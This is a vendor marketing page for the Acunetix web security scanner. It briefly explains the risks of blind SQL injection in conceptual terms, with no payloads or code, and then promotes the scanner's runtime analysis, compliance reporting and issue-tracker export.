Blind SQL injection (Blind SQLi) vulnerabilities are a class of SQL Injection vulnerabilities which can be leveraged by an attacker to exfiltrate data out of a database server (MySQL, MSSQL, Oracle…) using “blind” SQL injection techniques.
Blind SQL injection attacks, while slightly harder for an attacker to pull off, exposes the exact same threats that it’s error-based and UNION-based SQL Injection cousins do. Blind SQL injection vulnerabilities may in some cases even lead to Remote Code Execution (RCE). Once an attacker gains the ability to execute arbitrary code on an application, it’s much easier for that attacker to escalate their attack and do more damage, such as, for example, “pivoting” to other hosts on the internal network in order to steal sensitive data.
Acunetix is a web security scanner designed to be lightning fast and dead simple to use while providing all the necessary features to manage and track vulnerabilities from discovery to resolution.
Beyond low hanging fruit
Runtime source code analysis
In addition to being a fully automated black box (no knowledge of backend code) vulnerability scanner, Acunetix also provides AcuSensor as part of its standard offering. AcuSensor is a an optional sensor for Java, ASP.NET and PHP applications that can easily be deployed on the application’s backend. Once deployed all source code and each SQL query is analysed while it is in execution by the scanner.
Say goodbye to useless reports
Finally, another problem that Acunetix solves which many other web vulnerability scanners sorley lack is the ability to produce great reports. After a vulnerability scan is complete, Acunetix can instantly generate a wide variety of technical and regulatory and compliance reports such as PCI DSS, HIPAA, OWASP Top 10 and many others. Additionally, Acunetix also allows users to export discovered vulnerabilities to Issue Trackers such as Atlassian JIRA, GitHub and Microsoft Team Foundation Server (TFS).
We use Acunetix as part of our Security in the SDLC and to test code in DEV and SIT before being promoted to Production.